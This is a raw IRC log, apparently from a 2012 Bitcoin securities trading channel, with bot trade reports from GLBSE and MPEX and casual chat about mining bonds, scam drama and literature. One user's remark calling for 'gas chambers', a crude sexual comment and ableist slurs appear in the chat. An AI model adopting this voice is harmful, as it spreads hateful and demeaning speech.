before I can buy a HDD> Sep 16 01:33:23 . Sep 16 01:34:10 Like I'd rather upgrade the ol' CPU. But it's going to take a new mobo and RAM too. I fret over this too much. :| Sep 16 01:37:09 Bane_Capital bdk_kluge bitfoo bonks brbot BTC-Mining BTCHero Bugpowder Sep 16 01:37:14 Bane_Capital https://bitcointalk.org/index.php?topic=77469.msg1193609#msg1193609 ? Sep 16 01:38:07 [GLBSE] [FPGAMINING] 1 @ 0.6119 BTC [-] Sep 16 01:38:08 [GLBSE] [FPGAMINING] 4 @ 0.61 = 2.44 BTC [-] Sep 16 01:38:10 [GLBSE] [FPGAMINING] 9 @ 0.601 = 5.409 BTC [-] Sep 16 01:38:11 [GLBSE] [FPGAMINING] 50 @ 0.601 = 30.05 BTC [-] Sep 16 01:38:11 [GLBSE] [FPGAMINING] 5 @ 0.60000001 = 3 BTC [-] Sep 16 01:38:12 [GLBSE] [FPGAMINING] 5 @ 0.60000001 = 3 BTC [-] Sep 16 01:38:14 [GLBSE] [FPGAMINING] 16 @ 0.6 = 9.6 BTC [-] Sep 16 01:39:42 [GLBSE] [GIGAMINING] 2 @ 0.63100001 = 1.262 BTC [-] Sep 16 01:39:44 [GLBSE] [GIGAMINING] 1 @ 0.631 BTC [-] Sep 16 01:40:07 [GLBSE] [OBSI.HRPT] 1 @ 0.09999999 BTC [-] Sep 16 01:42:34 hmmm Sep 16 01:42:38 disconnected again Sep 16 01:43:35 [GLBSE] [FPGAMINING] 1 @ 0.699 BTC [+] Sep 16 01:44:31 [GLBSE] [GIGAMINING] 1 @ 0.62999999 BTC [-] Sep 16 01:44:34 [MPEX] [F.GIGA.ETF] 1900 @ 0.0003967 = 0.7537 BTC [-] Sep 16 01:44:35 [MPEX] [S.MPOE] 20700 @ 0.00039888 = 8.2568 BTC [-] Sep 16 01:46:02 [MPEX] [O.BTCUSD.P200T] 109 @ 0.87438488 = 95.308 BTC [+] Sep 16 01:48:18 [GLBSE] [OBSI.HRPT] 4 @ 0.09999999 = 0.4 BTC [-] Sep 16 01:53:29 [GLBSE] [RSM] 1 @ 0.3 BTC [+] Sep 16 01:53:53 [GLBSE] [RSM] 2 @ 0.3 = 0.6 BTC [+] Sep 16 01:59:18 [GLBSE] [BITBOND] 1 @ 0.335 BTC [+] Sep 16 02:00:55 [GLBSE] [OBSI.HRPT] 6 @ 0.09999999 = 0.6 BTC [-] Sep 16 02:03:16 [GLBSE] [OBSI.HRPT] 1 @ 0.09999999 BTC [-] Sep 16 02:03:17 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [+] Sep 16 02:05:40 [GLBSE] [RSM] 2 @ 0.3 = 0.6 BTC [+] Sep 16 02:05:47 [GLBSE] [YABMC] 2 @ 0.09995 = 0.1999 BTC [-] Sep 16 02:07:46 [GLBSE] [PUREMINING] 1 @ 0.09475 BTC [-] Sep 16 02:08:10 [GLBSE] [PUREMINING] 4 @ 0.09475 = 0.379 BTC [-] Sep 16 02:09:08 damn, where's nefario? Sep 16 02:09:14 [GLBSE] [PUREMINING] 6 @ 0.0948 = 0.5688 BTC [+] Sep 16 02:10:23 moving chairs around prolly. Sep 16 02:12:20 [GLBSE] [PUREMINING] 1 @ 0.09475 BTC [-] Sep 16 02:13:02 [MPEX] [F.GIGA.ETF] 2526 @ 0.0003967 = 1.0021 BTC [-] Sep 16 02:15:07 aaaaaaaa Sep 16 02:15:15 fuckin fever. Sep 16 02:15:16 :( Sep 16 02:22:38 [GLBSE] [FUTUREFUND] 2 @ 0.00012682 = 0.0003 BTC [+] Sep 16 02:30:46 [GLBSE] [PUREMINING] 1 @ 0.09475 BTC [-] Sep 16 02:31:22 [GLBSE] [CPA] 3 @ 0.033 = 0.099 BTC [+] Sep 16 02:32:17 [GLBSE] [PUREMINING] 10 @ 0.0948 = 0.948 BTC [+] Sep 16 02:32:25 [GLBSE] [FDBF] 70 @ 0.15 = 10.5 BTC [+] Sep 16 02:33:23 [GLBSE] [PUREMINING] 10 @ 0.0948 = 0.948 BTC [+] Sep 16 02:33:55 [GLBSE] [PUREMINING] 10 @ 0.0948 = 0.948 BTC [+] Sep 16 02:36:13 [GLBSE] [PUREMINING] 5 @ 0.0948 = 0.474 BTC [+] Sep 16 02:37:32 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 16 02:37:33 [GLBSE] [GIGAMINING] 1 @ 0.62110001 BTC [-] Sep 16 02:37:35 [GLBSE] [GIGAMINING] 2 @ 0.6211 = 1.2422 BTC [-] Sep 16 02:38:25 [GLBSE] [PUREMINING] 20 @ 0.0948 = 1.896 BTC [+] Sep 16 02:39:03 [MPEX] [F.GIGA.ETF] 13235 @ 0.00039054 = 5.1688 BTC [-] Sep 16 02:46:04 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Sep 16 02:46:36 [GLBSE] [BMMO] 1 @ 0.07685 BTC [-] Sep 16 02:47:50 [GLBSE] [DI.BFLSC.FAIL] 20 @ 0.001 = 0.02 BTC [+] Sep 16 02:50:15 [GLBSE] [ASICMINER] 4 @ 0.1148899 = 0.4596 BTC [-] Sep 16 02:52:00 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 16 02:53:24 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Sep 16 02:59:29 [GLBSE] [OBSI.HRPT] 5 @ 0.1 = 0.5 BTC [+] Sep 16 03:05:02 [MPEX] [S.MPOE] 14841 @ 0.0004016 = 5.9601 BTC [+] Sep 16 03:05:04 [MPEX] [S.MPOE] 4950 @ 0.00040148 = 1.9873 BTC [-] Sep 16 03:17:33 [GLBSE] [GIGAMINING] 1 @ 0.62110001 BTC [+] Sep 16 03:17:35 [GLBSE] [GIGAMINING] 6 @ 0.6211 = 3.7266 BTC [-] Sep 16 03:17:40 [GLBSE] [ASICMINER] 1 @ 0.11 BTC [-] Sep 16 03:17:41 [GLBSE] [ASICMINER] 1 @ 0.109 BTC [-] Sep 16 03:17:43 [GLBSE] [ASICMINER] 7 @ 0.10810002 = 0.7567 BTC [-] Sep 16 03:17:44 [GLBSE] [ASICMINER] 5 @ 0.1081 = 0.5405 BTC [-] Sep 16 03:17:45 [GLBSE] [ASICMINER] 1 @ 0.106 BTC [-] Sep 16 03:31:03 [MPEX] [S.MPOE] 27913 @ 0.00040148 = 11.2065 BTC [-] Sep 16 03:52:40 [GLBSE] [OBSI.HRPT] 20 @ 0.1 = 2 BTC [+] Sep 16 03:58:02 [MPEX] [S.MPOE] 38379 @ 0.00039745 = 15.2537 BTC [-] Sep 16 04:04:47 [GLBSE] [FDBF] 5 @ 0.15 = 0.75 BTC [+] Sep 16 04:06:21 [GLBSE] [CPA] 30 @ 0.033 = 0.99 BTC [+] Sep 16 04:09:32 [GLBSE] [YABMC] 2 @ 0.09995 = 0.1999 BTC [-] Sep 16 04:09:34 [GLBSE] [YABMC] 1 @ 0.09995 BTC [-] Sep 16 04:09:35 [GLBSE] [BTC-MINING] 2 @ 0.96 = 1.92 BTC [-] Sep 16 04:09:35 [GLBSE] [BTC-MINING] 1 @ 0.87 BTC [-] Sep 16 04:09:37 [GLBSE] [BTC-MINING] 1 @ 0.861 BTC [-] Sep 16 04:09:38 [GLBSE] [BTC-MINING] 4 @ 0.81 = 3.24 BTC [-] Sep 16 04:09:39 [GLBSE] [BTC-MINING] 20 @ 0.80000003 = 16 BTC [-] Sep 16 04:09:40 [GLBSE] [BTC-MINING] 50 @ 0.80000002 = 40 BTC [-] Sep 16 04:11:35 !ticker gigamining Sep 16 04:11:38 [GLBSE:GIGAMINING] [Bid: 0.60000001] [Ask: 0.62099999] [Spread: 0.02099998] [Last: 0.6211] [24hVol: 236.74848782] [7dAvg: 0.60593902] Sep 16 04:11:42 HEY! Sep 16 04:11:55 Stop devaluating me =/ Sep 16 04:12:16 BTC-Mining lol it is a sucky feeling to sit here and watch ppl sell you off huh Sep 16 04:12:42 [GLBSE] [PPT.A] 2 @ 0.32 = 0.64 BTC [+] Sep 16 04:12:44 Depends if I have bids to catch selloffs... Sep 16 04:12:46 [GLBSE] [FPGAMINING] 26 @ 0.6 = 15.6 BTC [-] Sep 16 04:13:08 I do already own a subtanstial portion of BTC-MINING Sep 16 04:13:34 [GLBSE] [PPT.E] 7 @ 0.32 = 2.24 BTC [-] Sep 16 04:14:17 so do i. Sep 16 04:14:41 [GLBSE] [PPT.B] 4 @ 0.32 = 1.28 BTC [+] Sep 16 04:15:13 What? Sep 16 04:16:32 own a substantial portion of s.mpoe Sep 16 04:16:50 there was a massive selloff yest, maybe you weren't here. Sep 16 04:16:56 Yeah, that's what I thought. Sep 16 04:17:25 Don't you know to specify what you're talking about when you change context to a related situation? Sep 16 04:21:34 [GLBSE] [BITBOND] 1 @ 0.332 BTC [-] Sep 16 04:21:35 [GLBSE] [BITBOND] 11 @ 0.331 = 3.641 BTC [-] Sep 16 04:21:36 [GLBSE] [BITBOND] 1 @ 0.3300001 BTC [-] Sep 16 04:21:37 [GLBSE] [BITBOND] 9 @ 0.311 = 2.799 BTC [-] Sep 16 04:21:39 [GLBSE] [BITBOND] 1 @ 0.31 BTC [-] Sep 16 04:21:40 [GLBSE] [BITBOND] 18 @ 0.31 = 5.58 BTC [-] Sep 16 04:25:20 [GLBSE] [ARS] 12 @ 0.0146 = 0.1752 BTC [-] Sep 16 04:25:56 [GLBSE] [ARS] 125 @ 0.0145 = 1.8125 BTC [-] Sep 16 04:26:21 [GLBSE] [ARS] 13 @ 0.0144 = 0.1872 BTC [-] Sep 16 04:28:02 [MPEX] [F.GIGA.ETF] 2041 @ 0.00039054 = 0.7971 BTC [-] Sep 16 04:28:04 [MPEX] [F.GIGA.ETF] 6848 @ 0.00037948 = 2.5987 BTC [-] Sep 16 04:28:54 wtf ?! Sep 16 04:28:54 [GLBSE] [ARS] 50 @ 0.0144 = 0.72 BTC [-] Sep 16 04:29:27 wtf? This: Sep 16 04:29:34 I do already own a subtanstial portion of BTC-MINING Sep 16 04:29:36 [21:14] so do i. Sep 16 04:29:46 i was talking about giga.etf going to 38 Sep 16 04:29:55 You have to change context by specifying what Sep 16 04:30:05 oh, the etf Sep 16 04:30:08 (whoops i did it again :D) Sep 16 04:30:28 Well you won't upgrade, as such the etf is worth, well... Sep 16 04:30:53 it's odd that people'd value the future worth of a mining bond Sep 16 04:31:02 the future worth of all mining bonds is 0 on a long enough timeline Sep 16 04:31:40 Yes, but they expect it will lose value faster than revenue at this rate as it's fixed with non-ASIC hashing rate forever Sep 16 04:31:56 Hashing rate already started going up like crazy Sep 16 04:32:05 what's it by now Sep 16 04:32:07 ;;bc,diff Sep 16 04:32:08 2694047.952955 Sep 16 04:32:19 only 35% past coupla months Sep 16 04:35:08 it actually almost doubled in the past 4 months Sep 16 04:36:24 including 54 percent increase for the last 2 months Sep 16 04:38:51 o, has it ? Sep 16 04:38:54 yeah, crazy. Sep 16 04:39:59 [GLBSE] [ASICMINER] 1 @ 0.1065001 BTC [+] Sep 16 04:40:13 strange that price hasn't moved much (even downward since end of august where it was at 15 USD a piece Sep 16 04:40:45 Sometimes I wonder Sep 16 04:41:08 [GLBSE] [CPA] 1 @ 0.03100001 BTC [-] Sep 16 04:42:41 [GLBSE] [OBSI.HRPT] 40 @ 0.1 = 4 BTC [+] Sep 16 04:47:37 reading DMC thread Sep 16 04:47:59 funny to see usagi finally understand that DMC is a POS and Diablo has fscked over his investors Sep 16 04:48:11 he argued this fact with me a few days back Sep 16 04:48:20 << I buy DMC shares Sep 16 04:48:22 JWU42: yeah, usagi outed himself on that Sep 16 04:48:30 hey Diablo-D3 Sep 16 04:48:53 back to more reading... Sep 16 04:50:18 JWU42 i'd guess his ito integral calculus wasn't finished yet a few days ago Sep 16 04:50:19 shit takes time. Sep 16 04:50:30 ROFL Sep 16 04:50:42 memes, we have them Sep 16 04:50:50 im sorry, that one's too rich to resist. Sep 16 04:51:21 That is Apple's solar farm powered data center facility. They have one, so why can't Bitcoin? Sep 16 04:51:29 quoting here ^ Sep 16 04:51:34 Ain't there no one selling DMC shares? Sep 16 04:51:42 BTC-Mining: er, quite a few people? Sep 16 04:51:48 if you are asking the question then i really don't know how to help you... Sep 16 04:51:56 unless nefario decided to fuck shareholders, there was like a few thousand Sep 16 04:52:18 I mean cheaper than .07 ish Sep 16 04:53:22 !ticker S.Dice Sep 16 04:53:23 [MPEX:S.DICE] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.0032 / 0.00329454 / 0.0034 (4637641 shares, 15,278.91 BTC) Sep 16 04:54:02 [MPEX] [S.MPOE] 6521 @ 0.00039745 = 2.5918 BTC [-] Sep 16 04:54:03 [MPEX] [S.MPOE] 5852 @ 0.00039564 = 2.3153 BTC [-] Sep 16 04:56:26 I'm about to pay out KRAKEN's dividend. If anyone is interested in that =/ Sep 16 04:56:39 [GLBSE] [KRAKEN] 938 @ 0.009 = 8.442 BTC [-] Sep 16 04:56:54 lol Sep 16 04:57:00 so Sep 16 04:57:02 we had pirate Sep 16 04:57:05 then we have kraken Sep 16 04:57:10 and we have the flying dutchman Sep 16 04:57:37 It's patrick buying pirate debt and going legal against pirate =/ Sep 16 04:57:57 I was unhappy it has nothing to do with lending or any other of his operations =/ Sep 16 04:58:00 cant we just have keira knightley's tits and be done with it? Sep 16 04:58:21 and why is the rum always gone? Sep 16 04:59:32 BTC-Mining seems to me he'll hve a ton of pirate debt anyway, from the ppts Sep 16 05:01:14 indeed Sep 16 05:01:47 if he wants to take the fight to pirate, I wish him luck Sep 16 05:01:57 Looking to float my startup firm and investment vehicles via crowdfunding Sep 16 05:01:58 ARR Sep 16 05:01:58 sigh. Sep 16 05:02:10 mircea_popescu: dont bother Sep 16 05:02:22 no but i just mean Sep 16 05:02:22 who wants to take bets on my recovery rate for my non-pirate loans!? Sep 16 05:02:23 the community will try to steal your money because they're greedy fucks Sep 16 05:02:29 who the fuck does everyone take themselves for. Sep 16 05:02:40 copumpkin blind ? Sep 16 05:02:45 yep! Sep 16 05:02:48 10 cents to the dollar. Sep 16 05:02:49 pull a number out of your ass Sep 16 05:02:51 hah okay Sep 16 05:03:01 I hope not! Sep 16 05:03:09 I want 2 dollars to the dollar Sep 16 05:03:13 well, when pulling numbers out of my ass i do degree of magnitude eval Sep 16 05:03:13 what are the odds? Sep 16 05:03:19 since i dont think it's gonna be 100% it will have to be 10% Sep 16 05:03:26 :) Sep 16 05:03:34 20% would be prolly over 60% Sep 16 05:03:37 the logarithmic asshole approach Sep 16 05:03:40 yes. Sep 16 05:03:51 that's the best kind Sep 16 05:04:42 you shoulda went into mpoe bonds, you could look at 51% ish now. Sep 16 05:05:28 "Anyone on this forum is here, not because of money and greed (i hope) but because they recognise the old ways are dying and that is an exciting time for smaller organisations and agile minded individuals looking to exploit niches and opportunities not previously available." Sep 16 05:05:35 no, seriously, we need gas chambers. Sep 16 05:07:20 Chaang-Noi did you buy those 80 fake glbbq shares to cause more drama ? Sep 16 05:20:02 [MPEX] [F.GIGA.ETF] 1400 @ 0.00037948 = 0.5313 BTC [-] Sep 16 05:23:11 "I wouldn't sell any of my personal assets to cover any bitcoin losses. This is a business, it has failed. When businesses fail they shut down and usually nobody gets anything." Sep 16 05:23:14 gotta love hashking. Sep 16 05:33:43 [GLBSE] [OBSI.HRPT] 76 @ 0.1 = 7.6 BTC [+] Sep 16 05:46:02 [MPEX] [S.MPOE] 38700 @ 0.00039781 = 15.3952 BTC [+] Sep 16 05:54:36 It was not a business, it was interest bearing deposits... like at the bank... Sep 16 05:59:05 All assets should cover bitcoin losses =/ Sep 16 05:59:42 well, it changes with the wind. it reminds me of skepsidyne guy. Sep 16 06:00:09 I feel ashamed doing business around those forums sometimes... Sep 16 06:01:22 qft. Sep 16 06:02:21 I feel like if I've ever told anyone that had any logic or sense I did business there, and they'd go to see how it looks like and read, they'd be: wtf? Sep 16 06:02:50 Wondering if I'm either of a retarted investor or a retarded scammer =/ Sep 16 06:04:10 BTC-Mining you're a butterfly that sleeps and dreams Sep 16 06:05:28 I am unsure of the meaning of that expression. Sep 16 06:05:52 it's a koan reference. master sleeps and dreams he was a butterfly Sep 16 06:06:05 wakes up wonders if maybe he's a butterfly that sleeps and dreams he's master. Sep 16 06:06:33 eh Sep 16 06:07:56 Welcome to eastern philosophy Sep 16 06:09:49 im rurprised there's anyone reft that nevel heald that. Sep 16 06:11:02 [MPEX] [O.BTCUSD.P140T] 2 @ 0.28315033 = 0.5663 BTC [-] Sep 16 06:11:23 There'll allways be plenty of butterflies Sep 16 06:11:45 [GLBSE] [BAKEWELL] 2 @ 0.15 = 0.3 BTC [+] Sep 16 06:12:17 [GLBSE] [OBSI.HRPT] 7 @ 0.1 = 0.7 BTC [+] Sep 16 06:18:58 surprised? I wouldn't be surprised if 90% of people never heard that. Sep 16 06:19:36 well... i dunno. seems a really basic / general knowlesge thing. like everyone heard of laocoon and his snakes/ Sep 16 06:19:48 who? Sep 16 06:19:49 Nope =/ Sep 16 06:19:51 [GLBSE] [SS] 9 @ 0.025 = 0.225 BTC [+] Sep 16 06:20:25 .wik laocoon Sep 16 06:20:27 "Laocoön ( /leɪˈɒkɵ.ɒn/; Ancient Greek: Λαοκόων, IPA: [laokóɔːn]) the son of Acoetes[1]| is a figure in Greek and Roman mythology." - http://en.wikipedia.org/wiki/Laocoon Sep 16 06:20:33 [GLBSE] [OBSI.HRPT] 84 @ 0.1 = 8.4 BTC [+] Sep 16 06:22:56 I pretty much never heard of any such stories. Pretty much anything before 1800 or outside the Western Europe/Canada is poorly reviewed in eductation for litterature. Or anything else for that matter. Sep 16 06:23:22 pity. Sep 16 06:23:42 Indeed Sep 16 06:24:12 [GLBSE] [KRAKEN] 1 @ 0.00999996 BTC [+] Sep 16 06:25:39 Focus in history was highly put on events since the discovery of America leading to the establishment of Canada and it's history. Sep 16 06:26:06 Litterature was highly focused on French Canadian authors and French authors. Sep 16 06:27:16 french canadian authors. hm.. Sep 16 06:27:52 I forgot myself, there's no truly interesting authors honestly =/ Sep 16 06:28:03 aww Sep 16 06:28:33 French authors were far more interesting Sep 16 06:29:24 http://www.youtube.com/watch?feature=endscreen&v=DQv6EQvheOw Sep 16 06:29:31 Well French Canadian were mostly colonists, farmers... then in the recent days, there's not much Sep 16 06:29:36 i don't remember whom i recently got reading candide Sep 16 06:29:43 o, i think it was smickles. Sep 16 06:33:32 French canadian litterature is mostly grey (as in not dark litterature, but still sad) Sep 16 06:33:34 [GLBSE] [BLUECHIP] 2 @ 0.1 = 0.2 BTC [+] Sep 16 06:33:50 haha i see Sep 16 06:33:55 Mostly talking about poverty, nature, amerindians, etc... Sep 16 06:34:09 At least for anything not modern =/ Sep 16 06:34:32 Well there's some very good ones Sep 16 06:35:02 [GLBSE] [SS] 2 @ 0.025 = 0.05 BTC [+] Sep 16 06:35:55 Released Wednesday, the study found that 821,000 households opted out of the banking system from 2009 to 2011 and that the so-called unbanked population grew to 8.2 percent of U.S. households. Sep 16 06:36:07 [GLBSE] [NYAN.B] 1 @ 0.989 BTC [-] Sep 16 06:36:11 that's 24 million people who need bitcoin. Sep 16 06:36:34 Where is that study? Sep 16 06:37:01 http://www.washingtonpost.com/business/economy/more-americans-opting-out-of-banking-system/2012/09/12/6380b986-fcf1-11e1-a31e-804fccb658f9_story.html Sep 16 06:37:15 [GLBSE] [KRAKEN] 38 @ 0.00999996 = 0.38 BTC [+] Sep 16 06:37:22 I don't like people pulling numbers out of their ass and making them pass for anything else that it is, considering the source. So I have to ask to differentiate =P Sep 16 06:37:53 Try "Un homme et son péché" by Claude-Henri Grignon (1933) Sep 16 06:38:02 [MPEX] [F.GIGA.ETF] 5800 @ 0.00037948 = 2.201 BTC [-] Sep 16 06:38:08 Probably one of the best you can get in French Canadian litterature Sep 16 06:39:11 i think sometime i will. Sep 16 06:39:22 tho... sin... not really my interest. Sep 16 06:40:17 It's an excellent book =/ Sep 16 06:40:23 I don't know for translations however. Sep 16 06:40:31 i can read french. Sep 16 06:40:38 Excellent Sep 16 06:41:19 Seeing as all you probably see around bitcointalk and scam drama, you might be interested in a quality book about greed. Sep 16 06:42:08 [GLBSE] [FDBF] 1 @ 0.15 BTC [+] Sep 16 06:42:33 http://blockchain.info/address/1Bkk6QCL5PebNv5n4fog5E9JkkEKQeQjc1 Sep 16 06:42:40 that address tells a tale of greed Sep 16 06:43:02 1.4k btc ? Sep 16 06:43:10 click click click Sep 16 06:43:23 quickly, all the links Sep 16 06:44:41 what are you reffering to? Sep 16 06:44:57 i be trollin Sep 16 06:46:37 lol catalonia wants to break off from spain nao. Sep 16 06:47:06 Everybody wants to break off from everybody Sep 16 06:47:22 We'll be back to city-states like in old Greece! Sep 16 06:47:33 that'd be so kickass i think i came a little. Sep 16 06:48:09 We'd need an impossible to counterfeit currency to exchange between cities however... hmm Sep 16 06:49:02 But managing cities as a small unit would be far more efficient than large bureaucratic governments... Sep 16 06:49:26 BTC-Mining i wonder what impossible to counterfit currencies are there... hmmm... Sep 16 06:49:49 We'd have the problem of some cities going military/fortress/conquer mode on their neighbors however. Sep 16 06:50:44 Life would be far more erratic and wealth would vary alot more on smaller distances between even neighboring cities, probably. Sep 16 06:50:53 BTC-Mining splendid. Sep 16 06:50:59 Well life would be interesting at least. Sep 16 06:51:02 [MPEX] [O.BTCUSD.P150T] 2 @ 0.36713172 = 0.7343 BTC [-] Sep 16 07:04:02 [MPEX] [O.BTCUSD.C090T] 774 @ 0.3095205 = 239.5689 BTC [+] Sep 16 07:06:10 Diablo-D3: what would you want me to say about that? Sep 16 07:30:02 [MPEX] [F.GIGA.ETF] 723 @ 0.00037948 = 0.2744 BTC [-] Sep 16 07:30:03 [MPEX] [F.GIGA.ETF] 2000 @ 0.00037773 = 0.7555 BTC [-] Sep 16 07:30:04 [MPEX] [F.GIGA.ETF] 7977 @ 0.00037711 = 3.0082 BTC [-] Sep 16 07:33:24 smickles: about what Sep 16 07:56:01 [MPEX] [F.GIGA.ETF] 1391 @ 0.00037711 = 0.5246 BTC [-] Sep 16 07:56:03 [MPEX] [F.GIGA.ETF] 784 @ 0.00037615 = 0.2949 BTC [-] Sep 16 07:56:04 [MPEX] [F.GIGA.ETF] 9725 @ 0.00037407 = 3.6378 BTC [-] Sep 16 08:12:19 hey guys Sep 16 08:12:28 how do I make the bot tell me how many shares of DMC are under 1 btc Sep 16 08:12:46 afaik not implemented yet. Sep 16 08:13:01 kakobreklaa you around ? Sep 16 08:13:11 goddamnit Sep 16 08:22:01 [MPEX] [S.MPOE] 9400 @ 0.00039781 = 3.7394 BTC [+] Sep 16 08:31:09 Diablo-D3: why? Sep 16 08:33:31 why what Sep 16 08:34:32 Do you want to know about DMC shares Sep 16 08:34:45 just wanted to know Sep 16 08:51:40 hah Sep 16 08:51:47 nefario canceled my sell order Sep 16 08:52:01 [MPEX] [F.GIGA.ETF] 3275 @ 0.00037407 = 1.2251 BTC [-] Sep 16 08:52:03 [MPEX] [S.MPOE] 500 @ 0.00039781 = 0.1989 BTC [+] Sep 16 08:52:04 [MPEX] [S.MPOE] 7587 @ 0.00039998 = 3.0346 BTC [+] Sep 16 08:52:06 maybe I should buy him a shovel off of amazon Sep 16 08:52:42 I thought your account was frozen Sep 16 08:52:48 it is Sep 16 08:52:53 How can you place orders? Sep 16 08:53:00 it existed before he froze it Sep 16 08:53:12 oh. A bit late to notice. Sep 16 08:56:53 he said he didnt halt dmc trading Sep 16 08:56:54 so hes a liar Sep 16 09:00:42 [MPEX] [O.BTCUSD.P130T] 2 @ 0.19834964 = 0.3967 BTC [+] Sep 16 09:07:50 It's not alted, just your account I guess Sep 16 09:29:02 [MPEX] [F.GIGA.ETF] 4400 @ 0.00036862 = 1.6219 BTC [-] Sep 16 09:29:03 [MPEX] [F.GIGA.ETF] 9900 @ 0.00036762 = 3.6394 BTC [-] Sep 16 09:31:18 [MPEX] [F.GIGA.ETF] 7225 @ 0.0003724 = 2.6906 BTC [+] Sep 16 09:32:02 [MPEX] [F.GIGA.ETF] 556 @ 0.00039412 = 0.2191 BTC [+] Sep 16 09:32:03 [MPEX] [F.GIGA.ETF] 219 @ 0.00042 = 0.092 BTC [+] Sep 16 09:33:24 [GLBSE] [PUREMINING] 3 @ 0.0948 = 0.2844 BTC [+] Sep 16 09:36:38 mircea_popescu's been talking about ito? Sep 16 09:36:46 I thought everyone had forgotten about all that stochastic crap Sep 16 09:36:54 huh ? Sep 16 09:37:16 #bitcoin-stochastic-calculus is the place to be, I guess Sep 16 09:46:06 "As an example, I have 1000 coins with HashKing that I don't worry about," Sep 16 09:46:12 this should be a factoid somewhere lmao Sep 16 09:46:26 [GLBSE] [FUTUREFUND] 3 @ 0.00012682 = 0.0004 BTC [+] Sep 16 09:46:53 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 16 09:47:22 [GLBSE] [FUTUREFUND] 1 @ 0.00012682 BTC [+] Sep 16 09:48:20 [GLBSE] [TEEK.B] 2 @ 0.265 = 0.53 BTC [+] Sep 16 09:50:40 [GLBSE] [ZETA-MINING] 2 @ 0.16499997 = 0.33 BTC [+] Sep 16 09:51:26 [GLBSE] [ZETA-MINING] 1 @ 0.16499998 BTC [+] Sep 16 10:04:01 [MPEX] [F.GIGA.ETF] 2000 @ 0.00039204 = 0.7841 BTC [-] Sep 16 10:04:03 [MPEX] [F.GIGA.ETF] 1480 @ 0.00039063 = 0.5781 BTC [-] Sep 16 10:11:15 [GLBSE] [HYDRO.BONDS] 2 @ 1.4499 = 2.8998 BTC [+] Sep 16 10:16:43 [GLBSE] [NYAN.B] 3 @ 0.99 = 2.97 BTC [+] Sep 16 10:20:49 [GLBSE] [OBSI.HRPT] 8 @ 0.1 = 0.8 BTC [+] Sep 16 10:30:03 [MPEX] [S.MPOE] 7564 @ 0.00040291 = 3.0476 BTC [+] Sep 16 10:37:53 [GLBSE] [OBSI.HRPT] 4 @ 0.1 = 0.4 BTC [+] Sep 16 10:43:22 [GLBSE] [BFLS.RIG] 1 @ 0.9 BTC [+] Sep 16 10:48:00 [GLBSE] [PPT.E] 82 @ 0.32 = 26.24 BTC [-] Sep 16 10:48:29 [GLBSE] [PPT.A] 19 @ 0.32 = 6.08 BTC [+] Sep 16 10:48:45 [GLBSE] [PPT.B] 22 @ 0.32 = 7.04 BTC [+] Sep 16 10:50:37 wat Sep 16 10:55:24 [GLBSE] [HYDRO.BONDS] 2 @ 1.39021 = 2.7804 BTC [-] Sep 16 10:55:25 [GLBSE] [HYDRO.BONDS] 5 @ 1.39011 = 6.9506 BTC [-] Sep 16 10:56:00 [GLBSE] [HYDRO.BONDS] 9 @ 1.351 = 12.159 BTC [-] Sep 16 10:56:02 [MPEX] [F.GIGA.ETF] 4658 @ 0.00039063 = 1.8196 BTC [-] Sep 16 10:56:03 [MPEX] [F.GIGA.ETF] 642 @ 0.00038674 = 0.2483 BTC [-] Sep 16 10:57:10 [GLBSE] [HYDRO.BONDS] 2 @ 1.3511 = 2.7022 BTC [+] Sep 16 10:57:11 [GLBSE] [HYDRO.BONDS] 50 @ 1.35 = 67.5 BTC [-] Sep 16 10:57:19 [GLBSE] [HYDRO.BONDS] 2 @ 1.4499 = 2.8998 BTC [+] Sep 16 10:58:48 [GLBSE] [NYAN.B] 1 @ 0.99 BTC [+] Sep 16 11:00:39 [GLBSE] [YABMC] 44 @ 0.09025 = 3.971 BTC [-] Sep 16 11:04:59 [GLBSE] [GIGAMINING] 1 @ 0.62099997 BTC [-] Sep 16 11:05:01 [GLBSE] [GIGAMINING] 2 @ 0.62099998 = 1.242 BTC [+] Sep 16 11:06:39 [GLBSE] [GMVT-BOT] 45 @ 0.12011001 = 5.405 BTC [-] Sep 16 11:07:53 [GLBSE] [TYGRR.BOND-A] 4 @ 0.115 = 0.46 BTC [-] Sep 16 11:08:35 [GLBSE] [PPT.E] 60 @ 0.32 = 19.2 BTC [-] Sep 16 11:09:46 [GLBSE] [NASTY] 7 @ 0.5201 = 3.6407 BTC [-] Sep 16 11:10:09 [GLBSE] [NASTY] 6 @ 0.52 = 3.12 BTC [-] Sep 16 11:11:12 [GLBSE] [NASTY] 6 @ 0.5103 = 3.0618 BTC [-] Sep 16 11:12:00 [GLBSE] [NASTY] 1 @ 0.5103 BTC [-] Sep 16 11:12:02 [GLBSE] [NASTY] 6 @ 0.5102 = 3.0612 BTC [-] Sep 16 11:12:03 [GLBSE] [NASTY] 4 @ 0.5 = 2 BTC [-] Sep 16 11:15:25 [GLBSE] [ASICMINER] 2 @ 0.1139 = 0.2278 BTC [+] Sep 16 11:16:20 [GLBSE] [BBBB] 15 @ 0.00018 = 0.0027 BTC [-] Sep 16 11:16:58 [GLBSE] [DMC] 4 @ 0.03600101 = 0.144 BTC [-] Sep 16 11:17:00 [GLBSE] [DMC] 11 @ 0.036001 = 0.396 BTC [-] Sep 16 11:17:01 [GLBSE] [DMC] 1 @ 0.035 BTC [-] Sep 16 11:17:02 [GLBSE] [DMC] 6 @ 0.035 = 0.21 BTC [-] Sep 16 11:17:04 [GLBSE] [DMC] 5 @ 0.03000001 = 0.15 BTC [-] Sep 16 11:17:05 [GLBSE] [DMC] 50 @ 0.03 = 1.5 BTC [-] Sep 16 11:17:35 [GLBSE] [OBSI.HRPT] 5 @ 0.09871002 = 0.4936 BTC [-] Sep 16 11:18:33 [GLBSE] [OBSI.HRPT] 10 @ 0.09871001 = 0.9871 BTC [-] Sep 16 11:18:43 [GLBSE] [OBSI.HRPT] 2 @ 0.09871002 = 0.1974 BTC [+] Sep 16 11:19:21 [GLBSE] [FDBF] 6 @ 0.15 = 0.9 BTC [+] Sep 16 11:19:25 [GLBSE] [BBBB] 200 @ 0.0002 = 0.04 BTC [+] Sep 16 11:20:08 [GLBSE] [OBSI.HRPT] 5 @ 